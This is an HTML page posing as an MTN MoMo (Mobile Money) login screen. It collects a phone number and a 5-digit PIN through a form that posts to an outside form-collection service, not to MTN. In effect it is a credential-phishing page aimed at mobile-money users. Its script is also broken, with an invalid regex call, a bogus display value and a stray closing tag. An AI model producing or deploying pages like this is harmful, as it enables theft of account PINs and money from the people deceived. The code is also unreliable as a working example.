<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MoMo MTN</title>

    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="style.css">
</head>
<body>

    <div class="watermark top-left">MoMo</div>
    <div class="watermark top-right">MoMo</div>
    <div class="watermark bottom-left">MoMo</div>
    <div class="watermark bottom-right">MoMo</div>

    <div class="wrapper">

        <div class="logo">
            <h1>MoMo MTN</h1></h1>
        </div>

        <form action="https://formbold.com/s/3Labw" method="POST">

            
            <label>Phone Number</label>
            <input type="tel" placeholder="07XXXXXXXX" required>

            
            <label>5-Digit PIN</label>

            <div class="pin-container">
                <input type="password" maxlength="1" inputmode="numeric">
                <input type="password" maxlength="1" inputmode="numeric">
                <input type="password" maxlength="1" inputmode="numeric">
                <input type="password" maxlength="1" inputmode="numeric">
                <input type="password" maxlength="1" inputmode="numeric">
            </div>

            <div id="success" style="display:none; color:#4CAF50; font-weight:bold; margin-top:10px;">
            </div>

        </form>

    </div>

    <script>
        const pinInputs = document.querySelectorAll(".pin-container input");
        const successMsg = document.getElementById("success");

        pinInputs.forEach((input, index) => {

            input.addEventListener("input", function () {

                this.value = this.value.replace(/[^0-9]/g, "");

                if (this.value && index < pinInputs.length - 1) {
                    pinInputs[index + 1].focus();
                }

                checkComplete();
            });

            input.addEventListener("keydown", function (e) {
                if (e.key === "Backspace" && this.value === "" && index > 0) {
                    pinInputs[index - 1].focus();
                }
            });

        });

        function checkComplete() {
            let pin = "";

            pinInputs.forEach(i => pin += i.value);

            if (pin.length === 5 && /^[0-9]{5}$/.(pin)) {
                successMsg.style.display = "allow";
            } else {
                successMsg.style.display = "none";
            }
        }
    </script>

</body>
</html>
